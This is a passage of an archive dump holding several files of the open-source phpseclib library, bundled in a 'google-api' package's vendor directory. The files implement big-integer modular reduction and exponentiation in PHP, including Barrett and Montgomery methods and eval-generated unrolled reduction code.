array_pad($m, $n, 0); $a = [self::VALUE => self::array_repeat(0, $n + 1)]; for ($i = 0; $i < $n; ++$i) { $temp = $a[self::VALUE][0] + $x[$i] * $y[0]; $temp = $temp - $class::BASE_FULL * ($class::BASE === 26 ? intval($temp / 0x4000000) : ($temp >> 31)); $temp = $temp * $cache[self::DATA][$key]; $temp = $temp - $class::BASE_FULL * ($class::BASE === 26 ? intval($temp / 0x4000000) : ($temp >> 31)); $temp = $class::addHelper($class::regularMultiply([$x[$i]], $y), false, $class::regularMultiply([$temp], $m), false); $a = $class::addHelper($a[self::VALUE], false, $temp[self::VALUE], false); $a[self::VALUE] = array_slice($a[self::VALUE], 1); } if (self::compareHelper($a[self::VALUE], false, $m, false) >= 0) { $a = $class::subtractHelper($a[self::VALUE], false, $m, false); } return $a[self::VALUE]; } } vendor/phpseclib/phpseclib/phpseclib/Math/BigInteger/Engines/PHP/Reductions/EvalBarrett.php000064400000036236147600400120027676 0ustar00google-api * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Math\BigInteger\Engines\PHP\Reductions; use phpseclib3\Math\BigInteger\Engines\PHP; use phpseclib3\Math\BigInteger\Engines\PHP\Base; /** * PHP Dynamic Barrett Modular Exponentiation Engine * * @author Jim Wigginton */ abstract class EvalBarrett extends Base { /** * Custom Reduction Function * * @see self::generateCustomReduction */ private static $custom_reduction; /** * Barrett Modular Reduction * * This calls a dynamically generated loop unrolled function that's specific to a given modulo. * Array lookups are avoided as are if statements testing for how many bits the host OS supports, etc. * * @param array $n * @param array $m * @param string $class * @return array */ protected static function reduce(array $n, array $m, $class) { $inline = self::$custom_reduction; return $inline($n); } /** * Generate Custom Reduction * * @param PHP $m * @param string $class * @return callable */ protected static function generateCustomReduction(PHP $m, $class) { $m_length = count($m->value); if ($m_length < 5) { $code = ' $lhs = new ' . $class . '(); $lhs->value = $x; $rhs = new ' . $class . '(); $rhs->value = [' . implode(',', array_map(self::class . '::float2string', $m->value)) . ']; list(, $temp) = $lhs->divide($rhs); return $temp->value; '; eval('$func = function ($x) { ' . $code . '};'); self::$custom_reduction = $func; //self::$custom_reduction = \Closure::bind($func, $m, $class); return $func; } $lhs = new $class(); $lhs_value = &$lhs->value; $lhs_value = self::array_repeat(0, $m_length + ($m_length >> 1)); $lhs_value[] = 1; $rhs = new $class(); list($u, $m1) = $lhs->divide($m); if ($class::BASE != 26) { $u = $u->value; } else { $lhs_value = self::array_repeat(0, 2 * $m_length); $lhs_value[] = 1; $rhs = new $class(); list($u) = $lhs->divide($m); $u = $u->value; } $m = $m->value; $m1 = $m1->value; $cutoff = count($m) + (count($m) >> 1); $code = ' if (count($n) > ' . (2 * count($m)) . ') { $lhs = new ' . $class . '(); $rhs = new ' . $class . '(); $lhs->value = $n; $rhs->value = [' . implode(',', array_map(self::class . '::float2string', $m)) . ']; list(, $temp) = $lhs->divide($rhs); return $temp->value; } $lsd = array_slice($n, 0, ' . $cutoff . '); $msd = array_slice($n, ' . $cutoff . ');'; $code .= self::generateInlineTrim('msd'); $code .= self::generateInlineMultiply('msd', $m1, 'temp', $class); $code .= self::generateInlineAdd('lsd', 'temp', 'n', $class); $code .= '$temp = array_slice($n, ' . (count($m) - 1) . ');'; $code .= self::generateInlineMultiply('temp', $u, 'temp2', $class); $code .= self::generateInlineTrim('temp2'); $code .= $class::BASE == 26 ? '$temp = array_slice($temp2, ' . (count($m) + 1) . ');' : '$temp = array_slice($temp2, ' . ((count($m) >> 1) + 1) . ');'; $code .= self::generateInlineMultiply('temp', $m, 'temp2', $class); $code .= self::generateInlineTrim('temp2'); /* if ($class::BASE == 26) { $code.= '$n = array_slice($n, 0, ' . (count($m) + 1) . '); $temp2 = array_slice($temp2, 0, ' . (count($m) + 1) . ');'; } */ $code .= self::generateInlineSubtract2('n', 'temp2', 'temp', $class); $subcode = self::generateInlineSubtract1('temp', $m, 'temp2', $class); $subcode .= '$temp = $temp2;'; $code .= self::generateInlineCompare($m, 'temp', $subcode); $code .= 'return $temp;'; eval('$func = function ($n) { ' . $code . '};'); self::$custom_reduction = $func; return $func; //self::$custom_reduction = \Closure::bind($func, $m, $class); } /** * Inline Trim * * Removes leading zeros * * @param string $name * @return string */ private static function generateInlineTrim($name) { return ' for ($i = count($' . $name . ') - 1; $i >= 0; --$i) { if ($' . $name . '[$i]) { break; } unset($' . $name . '[$i]); }'; } /** * Inline Multiply (unknown, known) * * @param string $input * @param array $arr * @param string $output * @param string $class * @return string */ private static function generateInlineMultiply($input, array $arr, $output, $class) { if (!count($arr)) { return 'return [];'; } $regular = ' $length = count($' . $input . '); if (!$length) { $' . $output . ' = []; }else{ $' . $output . ' = array_fill(0, $length + ' . count($arr) . ', 0); $carry = 0;'; for ($i = 0; $i < count($arr); $i++) { $regular .= ' $subtemp = $' . $input . '[0] * ' . $arr[$i]; $regular .= $i ? ' + $carry;' : ';'; $regular .= '$carry = '; $regular .= $class::BASE === 26 ? 'intval($subtemp / 0x4000000);' : '$subtemp >> 31;'; $regular .= '$' . $output . '[' . $i . '] = '; if ($class::BASE === 26) { $regular .= '(int) ('; } $regular .= '$subtemp - ' . $class::BASE_FULL . ' * $carry'; $regular .= $class::BASE === 26 ? ');' : ';'; } $regular .= '$' . $output . '[' . count($arr) . '] = $carry;'; $regular .= ' for ($i = 1; $i < $length; ++$i) {'; for ($j = 0; $j < count($arr); $j++) { $regular .= $j ? '$k++;' : '$k = $i;'; $regular .= ' $subtemp = $' . $output . '[$k] + $' . $input . '[$i] * ' . $arr[$j]; $regular .= $j ? ' + $carry;' : ';'; $regular .= '$carry = '; $regular .= $class::BASE === 26 ? 'intval($subtemp / 0x4000000);' : '$subtemp >> 31;'; $regular .= '$' . $output . '[$k] = '; if ($class::BASE === 26) { $regular .= '(int) ('; } $regular .= '$subtemp - ' . $class::BASE_FULL . ' * $carry'; $regular .= $class::BASE === 26 ? ');' : ';'; } $regular .= '$' . $output . '[++$k] = $carry; $carry = 0;'; $regular .= '}}'; //if (count($arr) < 2 * self::KARATSUBA_CUTOFF) { //} return $regular; } /** * Inline Addition * * @param string $x * @param string $y * @param string $result * @param string $class * @return string */ private static function generateInlineAdd($x, $y, $result, $class) { $code = ' $length = max(count($' . $x . '), count($' . $y . ')); $' . $result . ' = array_pad($' . $x . ', $length + 1, 0); $_' . $y . ' = array_pad($' . $y . ', $length, 0); $carry = 0; for ($i = 0, $j = 1; $j < $length; $i+=2, $j+=2) { $sum = ($' . $result . '[$j] + $_' . $y . '[$j]) * ' . $class::BASE_FULL . ' + $' . $result . '[$i] + $_' . $y . '[$i] + $carry; $carry = $sum >= ' . self::float2string($class::MAX_DIGIT2) . '; $sum = $carry ? $sum - ' . self::float2string($class::MAX_DIGIT2) . ' : $sum;'; $code .= $class::BASE === 26 ? '$upper = intval($sum / 0x4000000); $' . $result . '[$i] = (int) ($sum - ' . $class::BASE_FULL . ' * $upper);' : '$upper = $sum >> 31; $' . $result . '[$i] = $sum - ' . $class::BASE_FULL . ' * $upper;'; $code .= ' $' . $result . '[$j] = $upper; } if ($j == $length) { $sum = $' . $result . '[$i] + $_' . $y . '[$i] + $carry; $carry = $sum >= ' . self::float2string($class::BASE_FULL) . '; $' . $result . '[$i] = $carry ? $sum - ' . self::float2string($class::BASE_FULL) . ' : $sum; ++$i; } if ($carry) { for (; $' . $result . '[$i] == ' . $class::MAX_DIGIT . '; ++$i) { $' . $result . '[$i] = 0; } ++$' . $result . '[$i]; }'; $code .= self::generateInlineTrim($result); return $code; } /** * Inline Subtraction 2 * * For when $known is more digits than $unknown. This is the harder use case to optimize for. * * @param string $known * @param string $unknown * @param string $result * @param string $class * @return string */ private static function generateInlineSubtract2($known, $unknown, $result, $class) { $code = ' $' . $result . ' = $' . $known . '; $carry = 0; $size = count($' . $unknown . '); for ($i = 0, $j = 1; $j < $size; $i+= 2, $j+= 2) { $sum = ($' . $known . '[$j] - $' . $unknown . '[$j]) * ' . $class::BASE_FULL . ' + $' . $known . '[$i] - $' . $unknown . '[$i] - $carry; $carry = $sum < 0; if ($carry) { $sum+= ' . self::float2string($class::MAX_DIGIT2) . '; } $subtemp = '; $code .= $class::BASE === 26 ? 'intval($sum / 0x4000000);' : '$sum >> 31;'; $code .= '$' . $result . '[$i] = '; if ($class::BASE === 26) { $code .= '(int) ('; } $code .= '$sum - ' . $class::BASE_FULL . ' * $subtemp'; if ($class::BASE === 26) { $code .= ')'; } $code .= '; $' . $result . '[$j] = $subtemp; } if ($j == $size) { $sum = $' . $known . '[$i] - $' . $unknown . '[$i] - $carry; $carry = $sum < 0; $' . $result . '[$i] = $carry ? $sum + ' . $class::BASE_FULL . ' : $sum; ++$i; } if ($carry) { for (; !$' . $result . '[$i]; ++$i) { $' . $result . '[$i] = ' . $class::MAX_DIGIT . '; } --$' . $result . '[$i]; }'; $code .= self::generateInlineTrim($result); return $code; } /** * Inline Subtraction 1 * * For when $unknown is more digits than $known. This is the easier use case to optimize for. * * @param string $unknown * @param array $known * @param string $result * @param string $class * @return string */ private static function generateInlineSubtract1($unknown, array $known, $result, $class) { $code = '$' . $result . ' = $' . $unknown . ';'; for ($i = 0, $j = 1; $j < count($known); $i += 2, $j += 2) { $code .= '$sum = $' . $unknown . '[' . $j . '] * ' . $class::BASE_FULL . ' + $' . $unknown . '[' . $i . '] - '; $code .= self::float2string($known[$j] * $class::BASE_FULL + $known[$i]); if ($i != 0) { $code .= ' - $carry'; } $code .= '; if ($carry = $sum < 0) { $sum+= ' . self::float2string($class::MAX_DIGIT2) . '; } $subtemp = '; $code .= $class::BASE === 26 ? 'intval($sum / 0x4000000);' : '$sum >> 31;'; $code .= ' $' . $result . '[' . $i . '] = '; if ($class::BASE === 26) { $code .= ' (int) ('; } $code .= '$sum - ' . $class::BASE_FULL . ' * $subtemp'; if ($class::BASE === 26) { $code .= ')'; } $code .= '; $' . $result . '[' . $j . '] = $subtemp;'; } $code .= '$i = ' . $i . ';'; if ($j == count($known)) { $code .= ' $sum = $' . $unknown . '[' . $i . '] - ' . $known[$i] . ' - $carry; $carry = $sum < 0; $' . $result . '[' . $i . '] = $carry ? $sum + ' . $class::BASE_FULL . ' : $sum; ++$i;'; } $code .= ' if ($carry) { for (; !$' . $result . '[$i]; ++$i) { $' . $result . '[$i] = ' . $class::MAX_DIGIT . '; } --$' . $result . '[$i]; }'; $code .= self::generateInlineTrim($result); return $code; } /** * Inline Comparison * * If $unknown >= $known then loop * * @param array $known * @param string $unknown * @param string $subcode * @return string */ private static function generateInlineCompare(array $known, $unknown, $subcode) { $uniqid = uniqid(); $code = 'loop_' . $uniqid . ': $clength = count($' . $unknown . '); switch (true) { case $clength < ' . count($known) . ': goto end_' . $uniqid . '; case $clength > ' . count($known) . ':'; for ($i = count($known) - 1; $i >= 0; $i--) { $code .= ' case $' . $unknown . '[' . $i . '] > ' . $known[$i] . ': goto subcode_' . $uniqid . '; case $' . $unknown . '[' . $i . '] < ' . $known[$i] . ': goto end_' . $uniqid . ';'; } $code .= ' default: // do subcode } subcode_' . $uniqid . ':' . $subcode . ' goto loop_' . $uniqid . '; end_' . $uniqid . ':'; return $code; } /** * Convert a float to a string * * If you do echo floatval(pow(2, 52)) you'll get 4.6116860184274E+18. It /can/ be displayed without a loss of * precision but displayed in this way there will be precision loss, hence the need for this method. * * @param int|float $num * @return string */ private static function float2string($num) { if (!is_float($num)) { return (string) $num; } if ($num < 0) { return '-' . self::float2string(abs($num)); } $temp = ''; while ($num) { $temp = fmod($num, 10) . $temp; $num = floor($num / 10); } return $temp; } } google-api/vendor/phpseclib/phpseclib/phpseclib/Math/BigInteger/Engines/PHP/Reductions/Classic.php000064400000001706147600400120027115 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Math\BigInteger\Engines\PHP\Reductions; use phpseclib3\Math\BigInteger\Engines\PHP\Base; /** * PHP Classic Modular Exponentiation Engine * * @author Jim Wigginton */ abstract class Classic extends Base { /** * Regular Division * * @param array $x * @param array $n * @param string $class * @return array */ protected static function reduce(array $x, array $n, $class) { $lhs = new $class(); $lhs->value = $x; $rhs = new $class(); $rhs->value = $n; list(, $temp) = $lhs->divide($rhs); return $temp->value; } } vendor/phpseclib/phpseclib/phpseclib/Math/BigInteger/Engines/PHP/Reductions/Montgomery.php000064400000011024147600400120027607 0ustar00google-api * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Math\BigInteger\Engines\PHP\Reductions; use phpseclib3\Math\BigInteger\Engines\PHP\Montgomery as Progenitor; /** * PHP Montgomery Modular Exponentiation Engine * * @author Jim Wigginton */ abstract class Montgomery extends Progenitor { /** * Prepare a number for use in Montgomery Modular Reductions * * @param array $x * @param array $n * @param string $class * @return array */ protected static function prepareReduce(array $x, array $n, $class) { $lhs = new $class(); $lhs->value = array_merge(self::array_repeat(0, count($n)), $x); $rhs = new $class(); $rhs->value = $n; list(, $temp) = $lhs->divide($rhs); return $temp->value; } /** * Montgomery Multiply * * Interleaves the montgomery reduction and long multiplication algorithms together as described in * {@link http://www.cacr.math.uwaterloo.ca/hac/about/chap14.pdf#page=13 HAC 14.36} * * @param array $x * @param array $n * @param string $class * @return array */ protected static function reduce(array $x, array $n, $class) { static $cache = [ self::VARIABLE => [], self::DATA => [] ]; if (($key = array_search($n, $cache[self::VARIABLE])) === false) { $key = count($cache[self::VARIABLE]); $cache[self::VARIABLE][] = $x; $cache[self::DATA][] = self::modInverse67108864($n, $class); } $k = count($n); $result = [self::VALUE => $x]; for ($i = 0; $i < $k; ++$i) { $temp = $result[self::VALUE][$i] * $cache[self::DATA][$key]; $temp = $temp - $class::BASE_FULL * ($class::BASE === 26 ? intval($temp / 0x4000000) : ($temp >> 31)); $temp = $class::regularMultiply([$temp], $n); $temp = array_merge(self::array_repeat(0, $i), $temp); $result = $class::addHelper($result[self::VALUE], false, $temp, false); } $result[self::VALUE] = array_slice($result[self::VALUE], $k); if (self::compareHelper($result, false, $n, false) >= 0) { $result = $class::subtractHelper($result[self::VALUE], false, $n, false); } return $result[self::VALUE]; } /** * Modular Inverse of a number mod 2**26 (eg. 67108864) * * Based off of the bnpInvDigit function implemented and justified in the following URL: * * {@link http://www-cs-students.stanford.edu/~tjw/jsbn/jsbn.js} * * The following URL provides more info: * * {@link http://groups.google.com/group/sci.crypt/msg/7a137205c1be7d85} * * As for why we do all the bitmasking... strange things can happen when converting from floats to ints. For * instance, on some computers, var_dump((int) -4294967297) yields int(-1) and on others, it yields * int(-2147483648). To avoid problems stemming from this, we use bitmasks to guarantee that ints aren't * auto-converted to floats. The outermost bitmask is present because without it, there's no guarantee that * the "residue" returned would be the so-called "common residue". We use fmod, in the last step, because the * maximum possible $x is 26 bits and the maximum $result is 16 bits. Thus, we have to be able to handle up to * 40 bits, which only 64-bit floating points will support. * * Thanks to Pedro Gimeno Fortea for input! * * @param array $x * @param string $class * @return int */ protected static function modInverse67108864(array $x, $class) // 2**26 == 67,108,864 { $x = -$x[0]; $result = $x & 0x3; // x**-1 mod 2**2 $result = ($result * (2 - $x * $result)) & 0xF; // x**-1 mod 2**4 $result = ($result * (2 - ($x & 0xFF) * $result)) & 0xFF; // x**-1 mod 2**8 $result = ($result * ((2 - ($x & 0xFFFF) * $result) & 0xFFFF)) & 0xFFFF; // x**-1 mod 2**16 $result = $class::BASE == 26 ? fmod($result * (2 - fmod($x * $result, $class::BASE_FULL)), $class::BASE_FULL) : // x**-1 mod 2**26 ($result * (2 - ($x * $result) % $class::BASE_FULL)) % $class::BASE_FULL; return $result & $class::MAX_DIGIT; } } google-api/vendor/phpseclib/phpseclib/phpseclib/Math/BigInteger/Engines/PHP/Reductions/Barrett.php000064400000025716147600400120027146 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Math\BigInteger\Engines\PHP\Reductions; use phpseclib3\Math\BigInteger\Engines\PHP; use phpseclib3\Math\BigInteger\Engines\PHP\Base; /** * PHP Barrett Modular Exponentiation Engine * * @author Jim Wigginton */ abstract class Barrett extends Base { /** * Barrett Modular Reduction * * See {@link http://www.cacr.math.uwaterloo.ca/hac/about/chap14.pdf#page=14 HAC 14.3.3} / * {@link http://math.libtomcrypt.com/files/tommath.pdf#page=165 MPM 6.2.5} for more information. Modified slightly, * so as not to require negative numbers (initially, this script didn't support negative numbers). * * Employs "folding", as described at * {@link http://www.cosic.esat.kuleuven.be/publications/thesis-149.pdf#page=66 thesis-149.pdf#page=66}. To quote from * it, "the idea [behind folding] is to find a value x' such that x (mod m) = x' (mod m), with x' being smaller than x." * * Unfortunately, the "Barrett Reduction with Folding" algorithm described in thesis-149.pdf is not, as written, all that * usable on account of (1) its not using reasonable radix points as discussed in * {@link http://math.libtomcrypt.com/files/tommath.pdf#page=162 MPM 6.2.2} and (2) the fact that, even with reasonable * radix points, it only works when there are an even number of digits in the denominator. The reason for (2) is that * (x >> 1) + (x >> 1) != x / 2 + x / 2. If x is even, they're the same, but if x is odd, they're not. See the in-line * comments for details. * * @param array $n * @param array $m * @param class-string $class * @return array */ protected static function reduce(array $n, array $m, $class) { static $cache = [ self::VARIABLE => [], self::DATA => [] ]; $m_length = count($m); // if (self::compareHelper($n, $static::square($m)) >= 0) { if (count($n) > 2 * $m_length) { $lhs = new $class(); $rhs = new $class(); $lhs->value = $n; $rhs->value = $m; list(, $temp) = $lhs->divide($rhs); return $temp->value; } // if (m.length >> 1) + 2 <= m.length then m is too small and n can't be reduced if ($m_length < 5) { return self::regularBarrett($n, $m, $class); } // n = 2 * m.length if (($key = array_search($m, $cache[self::VARIABLE])) === false) { $key = count($cache[self::VARIABLE]); $cache[self::VARIABLE][] = $m; $lhs = new $class(); $lhs_value = &$lhs->value; $lhs_value = self::array_repeat(0, $m_length + ($m_length >> 1)); $lhs_value[] = 1; $rhs = new $class(); $rhs->value = $m; list($u, $m1) = $lhs->divide($rhs); $u = $u->value; $m1 = $m1->value; $cache[self::DATA][] = [ 'u' => $u, // m.length >> 1 (technically (m.length >> 1) + 1) 'm1' => $m1 // m.length ]; } else { extract($cache[self::DATA][$key]); } $cutoff = $m_length + ($m_length >> 1); $lsd = array_slice($n, 0, $cutoff); // m.length + (m.length >> 1) $msd = array_slice($n, $cutoff); // m.length >> 1 $lsd = self::trim($lsd); $temp = $class::multiplyHelper($msd, false, $m1, false); // m.length + (m.length >> 1) $n = $class::addHelper($lsd, false, $temp[self::VALUE], false); // m.length + (m.length >> 1) + 1 (so basically we're adding two same length numbers) //if ($m_length & 1) { // return self::regularBarrett($n[self::VALUE], $m, $class); //} // (m.length + (m.length >> 1) + 1) - (m.length - 1) == (m.length >> 1) + 2 $temp = array_slice($n[self::VALUE], $m_length - 1); // if even: ((m.length >> 1) + 2) + (m.length >> 1) == m.length + 2 // if odd: ((m.length >> 1) + 2) + (m.length >> 1) == (m.length - 1) + 2 == m.length + 1 $temp = $class::multiplyHelper($temp, false, $u, false); // if even: (m.length + 2) - ((m.length >> 1) + 1) = m.length - (m.length >> 1) + 1 // if odd: (m.length + 1) - ((m.length >> 1) + 1) = m.length - (m.length >> 1) $temp = array_slice($temp[self::VALUE], ($m_length >> 1) + 1); // if even: (m.length - (m.length >> 1) + 1) + m.length = 2 * m.length - (m.length >> 1) + 1 // if odd: (m.length - (m.length >> 1)) + m.length = 2 * m.length - (m.length >> 1) $temp = $class::multiplyHelper($temp, false, $m, false); // at this point, if m had an odd number of digits, we'd be subtracting a 2 * m.length - (m.length >> 1) digit // number from a m.length + (m.length >> 1) + 1 digit number. ie. there'd be an extra digit and the while loop // following this comment would loop a lot (hence our calling _regularBarrett() in that situation). $result = $class::subtractHelper($n[self::VALUE], false, $temp[self::VALUE], false); while (self::compareHelper($result[self::VALUE], $result[self::SIGN], $m, false) >= 0) { $result = $class::subtractHelper($result[self::VALUE], $result[self::SIGN], $m, false); } return $result[self::VALUE]; } /** * (Regular) Barrett Modular Reduction * * For numbers with more than four digits BigInteger::_barrett() is faster. The difference between that and this * is that this function does not fold the denominator into a smaller form. * * @param array $x * @param array $n * @param string $class * @return array */ private static function regularBarrett(array $x, array $n, $class) { static $cache = [ self::VARIABLE => [], self::DATA => [] ]; $n_length = count($n); if (count($x) > 2 * $n_length) { $lhs = new $class(); $rhs = new $class(); $lhs->value = $x; $rhs->value = $n; list(, $temp) = $lhs->divide($rhs); return $temp->value; } if (($key = array_search($n, $cache[self::VARIABLE])) === false) { $key = count($cache[self::VARIABLE]); $cache[self::VARIABLE][] = $n; $lhs = new $class(); $lhs_value = &$lhs->value; $lhs_value = self::array_repeat(0, 2 * $n_length); $lhs_value[] = 1; $rhs = new $class(); $rhs->value = $n; list($temp, ) = $lhs->divide($rhs); // m.length $cache[self::DATA][] = $temp->value; } // 2 * m.length - (m.length - 1) = m.length + 1 $temp = array_slice($x, $n_length - 1); // (m.length + 1) + m.length = 2 * m.length + 1 $temp = $class::multiplyHelper($temp, false, $cache[self::DATA][$key], false); // (2 * m.length + 1) - (m.length - 1) = m.length + 2 $temp = array_slice($temp[self::VALUE], $n_length + 1); // m.length + 1 $result = array_slice($x, 0, $n_length + 1); // m.length + 1 $temp = self::multiplyLower($temp, false, $n, false, $n_length + 1, $class); // $temp == array_slice($class::regularMultiply($temp, false, $n, false)->value, 0, $n_length + 1) if (self::compareHelper($result, false, $temp[self::VALUE], $temp[self::SIGN]) < 0) { $corrector_value = self::array_repeat(0, $n_length + 1); $corrector_value[count($corrector_value)] = 1; $result = $class::addHelper($result, false, $corrector_value, false); $result = $result[self::VALUE]; } // at this point, we're subtracting a number with m.length + 1 digits from another number with m.length + 1 digits $result = $class::subtractHelper($result, false, $temp[self::VALUE], $temp[self::SIGN]); while (self::compareHelper($result[self::VALUE], $result[self::SIGN], $n, false) > 0) { $result = $class::subtractHelper($result[self::VALUE], $result[self::SIGN], $n, false); } return $result[self::VALUE]; } /** * Performs long multiplication up to $stop digits * * If you're going to be doing array_slice($product->value, 0, $stop), some cycles can be saved. * * @see self::regularBarrett() * @param array $x_value * @param bool $x_negative * @param array $y_value * @param bool $y_negative * @param int $stop * @param string $class * @return array */ private static function multiplyLower(array $x_value, $x_negative, array $y_value, $y_negative, $stop, $class) { $x_length = count($x_value); $y_length = count($y_value); if (!$x_length || !$y_length) { // a 0 is being multiplied return [ self::VALUE => [], self::SIGN => false ]; } if ($x_length < $y_length) { $temp = $x_value; $x_value = $y_value; $y_value = $temp; $x_length = count($x_value); $y_length = count($y_value); } $product_value = self::array_repeat(0, $x_length + $y_length); // the following for loop could be removed if the for loop following it // (the one with nested for loops) initially set $i to 0, but // doing so would also make the result in one set of unnecessary adds, // since on the outermost loops first pass, $product->value[$k] is going // to always be 0 $carry = 0; for ($j = 0; $j < $x_length; ++$j) { // ie. $i = 0, $k = $i $temp = $x_value[$j] * $y_value[0] + $carry; // $product_value[$k] == 0 $carry = $class::BASE === 26 ? intval($temp / 0x4000000) : ($temp >> 31); $product_value[$j] = (int) ($temp - $class::BASE_FULL * $carry); } if ($j < $stop) { $product_value[$j] = $carry; } // the above for loop is what the previous comment was talking about. the // following for loop is the "one with nested for loops" for ($i = 1; $i < $y_length; ++$i) { $carry = 0; for ($j = 0, $k = $i; $j < $x_length && $k < $stop; ++$j, ++$k) { $temp = $product_value[$k] + $x_value[$j] * $y_value[$i] + $carry; $carry = $class::BASE === 26 ? intval($temp / 0x4000000) : ($temp >> 31); $product_value[$k] = (int) ($temp - $class::BASE_FULL * $carry); } if ($k < $stop) { $product_value[$k] = $carry; } } return [ self::VALUE => self::trim($product_value), self::SIGN => $x_negative != $y_negative ]; } } vendor/phpseclib/phpseclib/phpseclib/Math/BigInteger/Engines/PHP/Reductions/PowerOfTwo.php000064400000002540147600400120027525 0ustar00google-api * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Math\BigInteger\Engines\PHP\Reductions; use phpseclib3\Math\BigInteger\Engines\PHP\Base; /** * PHP Power Of Two Modular Exponentiation Engine * * @author Jim Wigginton */ abstract class PowerOfTwo extends Base { /** * Prepare a number for use in Montgomery Modular Reductions * * @param array $x * @param array $n * @param string $class * @return array */ protected static function prepareReduce(array $x, array $n, $class) { return self::reduce($x, $n, $class); } /** * Power Of Two Reduction * * @param array $x * @param array $n * @param string $class * @return array */ protected static function reduce(array $x, array $n, $class) { $lhs = new $class(); $lhs->value = $x; $rhs = new $class(); $rhs->value = $n; $temp = new $class(); $temp->value = [1]; $result = $lhs->bitwise_and($rhs->subtract($temp)); return $result->value; } } google-api/vendor/phpseclib/phpseclib/phpseclib/Math/BigInteger/Engines/PHP/OpenSSL.php000064400000001064147600400120024675 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Math\BigInteger\Engines\PHP; use phpseclib3\Math\BigInteger\Engines\OpenSSL as Progenitor; /** * OpenSSL Modular Exponentiation Engine * * @author Jim Wigginton */ abstract class OpenSSL extends Progenitor { } google-api/vendor/phpseclib/phpseclib/phpseclib/Math/BigInteger/Engines/PHP/Montgomery.php000064400000004537147600400120025562 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Math\BigInteger\Engines\PHP; use phpseclib3\Math\BigInteger\Engines\Engine; use phpseclib3\Math\BigInteger\Engines\PHP; use phpseclib3\Math\BigInteger\Engines\PHP\Reductions\PowerOfTwo; /** * PHP Montgomery Modular Exponentiation Engine * * @author Jim Wigginton */ abstract class Montgomery extends Base { /** * Test for engine validity * * @return bool */ public static function isValidEngine() { return static::class != __CLASS__; } /** * Performs modular exponentiation. * * @template T of Engine * @param Engine $x * @param Engine $e * @param Engine $n * @param class-string $class * @return T */ protected static function slidingWindow(Engine $x, Engine $e, Engine $n, $class) { // is the modulo odd? if ($n->value[0] & 1) { return parent::slidingWindow($x, $e, $n, $class); } // if it's not, it's even // find the lowest set bit (eg. the max pow of 2 that divides $n) for ($i = 0; $i < count($n->value); ++$i) { if ($n->value[$i]) { $temp = decbin($n->value[$i]); $j = strlen($temp) - strrpos($temp, '1') - 1; $j += $class::BASE * $i; break; } } // at this point, 2^$j * $n/(2^$j) == $n $mod1 = clone $n; $mod1->rshift($j); $mod2 = new $class(); $mod2->value = [1]; $mod2->lshift($j); $part1 = $mod1->value != [1] ? parent::slidingWindow($x, $e, $mod1, $class) : new $class(); $part2 = PowerOfTwo::slidingWindow($x, $e, $mod2, $class); $y1 = $mod2->modInverse($mod1); $y2 = $mod1->modInverse($mod2); $result = $part1->multiply($mod2); $result = $result->multiply($y1); $temp = $part2->multiply($mod1); $temp = $temp->multiply($y2); $result = $result->add($temp); list(, $result) = $result->divide($n); return $result; } } google-api/vendor/phpseclib/phpseclib/phpseclib/Math/BigInteger/Engines/PHP/DefaultEngine.php000064400000001110147600400120026114 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Math\BigInteger\Engines\PHP; use phpseclib3\Math\BigInteger\Engines\PHP\Reductions\EvalBarrett; /** * PHP Default Modular Exponentiation Engine * * @author Jim Wigginton */ abstract class DefaultEngine extends EvalBarrett { } google-api/vendor/phpseclib/phpseclib/phpseclib/Math/BigInteger/Engines/PHP/Base.php000064400000010762147600400120024271 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Math\BigInteger\Engines\PHP; use phpseclib3\Math\BigInteger\Engines\PHP; /** * PHP Modular Exponentiation Engine * * @author Jim Wigginton */ abstract class Base extends PHP { /** * Cache constants * * $cache[self::VARIABLE] tells us whether or not the cached data is still valid. * */ const VARIABLE = 0; /** * $cache[self::DATA] contains the cached data. * */ const DATA = 1; /** * Test for engine validity * * @return bool */ public static function isValidEngine() { return static::class != __CLASS__; } /** * Performs modular exponentiation. * * The most naive approach to modular exponentiation has very unreasonable requirements, and * and although the approach involving repeated squaring does vastly better, it, too, is impractical * for our purposes. The reason being that division - by far the most complicated and time-consuming * of the basic operations (eg. +,-,*,/) - occurs multiple times within it. * * Modular reductions resolve this issue. Although an individual modular reduction takes more time * then an individual division, when performed in succession (with the same modulo), they're a lot faster. * * The two most commonly used modular reductions are Barrett and Montgomery reduction. Montgomery reduction, * although faster, only works when the gcd of the modulo and of the base being used is 1. In RSA, when the * base is a power of two, the modulo - a product of two primes - is always going to have a gcd of 1 (because * the product of two odd numbers is odd), but what about when RSA isn't used? * * In contrast, Barrett reduction has no such constraint. As such, some bigint implementations perform a * Barrett reduction after every operation in the modpow function. Others perform Barrett reductions when the * modulo is even and Montgomery reductions when the modulo is odd. BigInteger.java's modPow method, however, * uses a trick involving the Chinese Remainder Theorem to factor the even modulo into two numbers - one odd and * the other, a power of two - and recombine them, later. This is the method that this modPow function uses. * {@link http://islab.oregonstate.edu/papers/j34monex.pdf Montgomery Reduction with Even Modulus} elaborates. * * @param PHP $x * @param PHP $e * @param PHP $n * @param string $class * @return PHP */ protected static function powModHelper(PHP $x, PHP $e, PHP $n, $class) { if (empty($e->value)) { $temp = new $class(); $temp->value = [1]; return $x->normalize($temp); } if ($e->value == [1]) { list(, $temp) = 